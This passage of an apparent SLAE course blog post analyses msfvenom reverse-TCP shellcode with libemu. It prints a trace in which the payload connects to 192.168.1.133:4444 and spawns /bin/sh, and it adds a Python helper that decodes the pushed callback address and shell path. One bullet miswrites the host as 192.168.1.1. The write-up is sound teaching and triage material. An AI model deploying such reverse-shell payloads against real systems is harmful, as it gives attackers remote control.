int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int dup2 (
     int oldfd = 14;
     int newfd = 2;
) =  2;
int dup2 (
     int oldfd = 14;
     int newfd = 1;
) =  1;
int dup2 (
     int oldfd = 14;
     int newfd = 0;
) =  0;
int connect (
     int sockfd = 14;
     struct sockaddr_in * serv_addr = 0x00416fbe => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = -2063488832 (host=192.168.1.133);
             };
             char sin_zero = "       ";
         };
     int addrlen = 102;
) =  0;
int execve (
     const char * dateiname = 0x00416fa6 => 
           = "//bin/sh";
     const char * argv[] = [
           = 0x00416f9e => 
               = 0x00416fa6 => 
                   = "//bin/sh";
           = 0x00000000 => 
           none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;
```
We also create a PNG graph of the shellcode as follows:

```shell
cat shell-reverse-tcp | sctest -vvv -Ss 100000 -G shell-reverse-tcp.dot
dot shell-reverse-tcp.dot -Tpng -o shell-reverse-tcp.png
```
![](https://www.suls.co.uk/wp-content/uploads/2021/06/image-4-681x1024.png)
Unsurprisingly, given our work on Assignment 2, the libemu breakdown and graph show the following actions being taken:
- Create a socket
- Duplicate STDERR, STDOUT and STDIN to the created socket
- Connect to 192.168.1.1 Port 4444
- Execute /bin/sh via execve
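Both the exec sample and the reverse shell build their execve path, and the reverse shell its sockaddr_in, out of push immediates, so neither the command string nor the target address appears contiguously in the payload bytes. The following Python script is an added example (not the post's own code and not part of libemu or msfvenom): it replays those pushes onto a simulated stack and decodes what connect() and execve() will actually see. The immediates are copied from the disassembly listings above, and decoding the two `push dword` values gives exactly the port 4444 and host 192.168.1.133 that libemu reports in its connect() summary.

```python
import socket
import struct

def stack_after_pushes(pushes):
    """Simulate a run of push-immediate instructions. `pushes` lists
    (value, width_in_bytes) in program order; the result is memory from the
    final esp upwards, which is how a C string or struct built this way is read."""
    stack = b""
    for value, width in pushes:
        stack = value.to_bytes(width, "little") + stack    # each push lowers esp
    return stack

def cstring_at_esp(stack):
    """The NUL-terminated string that starts at esp."""
    return stack.split(b"\x00", 1)[0].decode("ascii", errors="replace")

def decode_sockaddr_in(stack):
    """sockaddr_in as connect() reads it: sin_family in host (little-endian)
    order, sin_port and sin_addr in network (big-endian) order."""
    family = struct.unpack("<H", stack[0:2])[0]
    port = struct.unpack(">H", stack[2:4])[0]
    host = socket.inet_ntoa(stack[4:8])
    return family, host, port

# Immediates taken from the disassembly on the page; edx is 0 at every `push edx`.
EXEC_PATH = [(0x68732F, 4), (0x6E69622F, 4)]               # push 0x68732f ; push 0x6e69622f
EXEC_FLAG = [(0, 4), (0x632D, 2)]                           # push edx ; pushw 0x632d
REVERSE_ADDR = [(0x8501A8C0, 4), (0x5C110002, 4)]           # push dword 0x8501a8c0 ; push dword 0x5c110002
REVERSE_PATH = [(0, 4), (0x68732F6E, 4), (0x69622F2F, 4)]   # push edx ; push dword 0x68732f6e ; push dword 0x69622f2f

def exec_sample():
    """argv[0] (pointed to by ebx) and argv[1] (pointed to by edi) of linux/x86/exec."""
    path = cstring_at_esp(stack_after_pushes(EXEC_PATH))
    flag = cstring_at_esp(stack_after_pushes(EXEC_FLAG))
    return path, flag

def reverse_tcp_sample():
    """(family, host, port) handed to connect() and the path handed to execve()."""
    family, host, port = decode_sockaddr_in(stack_after_pushes(REVERSE_ADDR))
    return family, host, port, cstring_at_esp(stack_after_pushes(REVERSE_PATH))

if __name__ == "__main__":
    path, flag = exec_sample()
    print(f"exec:              execve({path!r}, [{path!r}, {flag!r}, <CMD>], 0)")
    family, host, port, shell = reverse_tcp_sample()
    print(f"shell_reverse_tcp: connect(sockfd, {{AF={family}, {host}:{port}}}) then execve({shell!r}, [{shell!r}], 0)")
```

The same replay works for any payload that assembles its arguments with `push`: collect the immediates in program order, and the bytes at the final esp are the argument. For a detection or triage workflow this is the quickest way to pull the callback address out of a raw reverse-shell sample without executing it.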
This completes assignment five; the source code is available on GitHub: https://github.com/su1s/SLAE
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1436